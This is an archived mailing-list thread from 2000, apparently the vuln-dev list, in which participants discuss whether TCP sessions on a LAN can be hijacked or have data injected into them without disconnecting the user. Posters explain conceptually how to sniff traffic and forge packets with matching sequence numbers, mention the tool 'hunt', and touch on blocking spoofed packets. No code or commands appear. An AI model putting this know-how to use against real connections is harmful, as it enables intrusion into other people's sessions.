OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Forge packets ?
From: George Gales (george_galesNON.AGILENT.COM)
Date: Tue Sep 12 2000 - 13:17:16 CDT


Hijacking normally involves knocking the original local user off the net one
way or another. I don't believe there's a way to hijack without causing a
disconnect without doing that.

Assuming the hijacker was able to impersonate the local user (monitor their
traffic, then inject spoofed packets with the right sequence numbers), the
original user would still get disconnected.

The cause is that, while the hijacker is sniffing the net to monitor the
local user's traffic (and adjusting it's sequence numbers to make things
work), the original local user isn't sniffing, and won't adjust his sequence
numbers to take into account the hijackers traffic.

As soon as the original local user communicates with the remote end (either
direction), the receiving end would notice the incorrect sequence numbers,
and things would go down the tubes (probably generate a RST and close the
connection).

If I'm wrong, please somebody explain...

-Simon
george_galesnon.agilent.com

-----Original Message-----
From: Samy Kamkar [CommPort5] [mailto:CommPort5LUCIDX.COM]
Sent: Monday, September 11, 2000 4:29 PM
To: VULN-DEVSECURITYFOCUS.COM
Subject: Re: Forge packets ?

Just sending packets (assuming there is a connection from your lan which
you're
able to sniff) with data without disconnecting connections should be pretty
simple. No handshakes needed since the connection will still be open from
the
local user...the local user will see it if (s)he sniffs the lan's packets
and
the remote host may echo the data which you sent, depending on the protocol.
You would need to sniff the packets which the local user is sending to the
remote host and then you'll need to create a packet matching what an
outgoing
packet from the local user would look like (correct sequence number, window
size, etc.) and send it on it's way...so it is possible. There are also
many
programs which already 'utilize' the local-net/tcp insecuritys. Not
allowing
spoofed packets out (although it won't necesarilly always be 'spoofed',
could
be from the same hostname depending on how the lan is set up) could stop
it...I'm not aware of the best way to stop this from happening, or how easy
it
is to not allow spoofed packets out.

Skreel wrote:

> So TCP hijacking is the solution ? I thought hunt could only hijack
> connections on
> port 23. What I actually want is to send data to remote host without
> dropping the
> user's connection, wether the user's sees the data or not (i'm only
talking
> theoritically)
> i just wanted to know if it was possible. And also if I used ipchains to
> IPmasquerade
> the lan, then wouldn't it be easier for an attacker to send data and
hijack
> the user's
> connection ? Is there anyway to prevent this kind of attack (if it is a
real
> attack )?